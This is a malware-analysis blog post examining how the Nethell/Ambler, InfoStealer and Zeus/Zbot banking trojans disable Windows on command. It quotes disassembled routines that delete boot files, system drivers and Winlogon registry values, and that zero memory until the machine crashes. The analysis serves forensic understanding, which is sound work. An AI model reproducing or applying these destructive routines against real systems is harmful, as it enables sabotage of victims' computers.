When a Bot master goes mad – Kill the OS

In Uncategorized

This time we are taking a close look about what things could happen with an infected computer when the running bot receives an specific command about to kill the Operating System. Not all type of bots usually have this functionality, but banking Trojans usually have. We will take three examples (InfoStealer, Zeus/Zbot and Nethell/Ambler), these are the most common Trojans where we’ve definitely found in their binaries the malicious code that is responsible for the Execution of Windows.

Nethell / Ambler:

Bot commands often can be observed with pure eyes in the binary as simple strings, however not as always trivial as in the case of Nethell:

Looking for the subroutine referencing to the above strings, we arrive to the code that is doing the dirty job:

mov esi, offset aCNtdetect_com ; “C:\NTDETECT.COM”
push edi
push esi
mov edi, SetFileAttributesA
and al, 0F8h
push eax
push esi
call edi
push esi
call DeleteFileA
mov esi, offset aCNtldr ; “C:\ntldr”

The code above deletes the files NTDETECT.COM and NTLDR, before deletion, removes the Hidden/System/Read-Only attribute bits. The other botcommand, KILLWINANDREBOOT, calls this same subroutine + immediately tries to do a system reboot.


The way of InfoStealer is undoubtedly effective:

push offset aDrivers_sys ; “\drivers\*.sys”
push eax ; Dest
call ds:wcscat
push 1 ; hFindFile
push offset delete ; int
lea eax, [ebp+FileName]push 98967Fh ; int
push eax ; lpFileName
call recursive_findfile
add esp, 18h
call reboot

The subroutine tries to delete each driver within the System32 directory, the first attempt is with a normal delete, in case it fails it is going to call the MoveFileEx API with the flag MOVEFILE_DELAY_UNTIL_REBOOT, which will delete the file upon startup.

InfoStealer also removes necessary registry keys for creating a logon session:

HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Shell = Explorer.exe
UIHost = logonui.exe
ServiceDll = rpcss.dll
ServiceDll = rpcss.dll

Zeus / Zbot:

Last but not least here comes the old Zeus. Considering that it requires the less code to execute, nevertheless it is the most aggressive and robust:

push eax

push 80000001h
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+50h]mov esi, 80000002h
push esi
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+54h]push esi
call ds:SHDeleteKeyA
push 3E8h
call ds:Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, ds:buffer
push 0Eh
push dword ptr [eax+30h]call write_read_namedpipe

It “just” deletes two kind of registry entries, but this will include WHOLE branches:


The execution flow does not end up here. After the deletion is finished, it sends a 0E command to its pipe server, where the following code starts zeroing bytes of the virtual memory (4GB):

push 8007h
call eax ; <--- SetErrorMode, to ignore everything
xor eax, eax
mov [eax], eax
xor eax, eax
; from address 0x00000000 – 0xFFFFFFFF
loc_1: mov byte ptr [eax], 0 ; fill the memory with zeros
inc eax
jmp short loc_1

Invoking Zeus’ method in our test environment resulted in a B.S.O.D (Blue Screen Of Death).

What could be the possible intention of an attacker to take the victim’s computer offline? To disappear and hide all tracks, making further analysis harder? Talking about banking trojans, obviously it is not. As we have seen non of these methods lead to a significant data loss, the trojan binaries are not removed, neither registry startup entries. The point more probably for a phisher is to earn time. Taking the victim away from Internet connection – before the unwanted money transfer is realized and further actions could be taken.

Of course, knowing these informations is not proposed to give tips for anyone how to kill the Windows, indeed hope it may help to roll up some misterious case, and may help forensic analysis.

Jozsef Gegeny
S21sec e-crime

Recommended Posts

Leave a Comment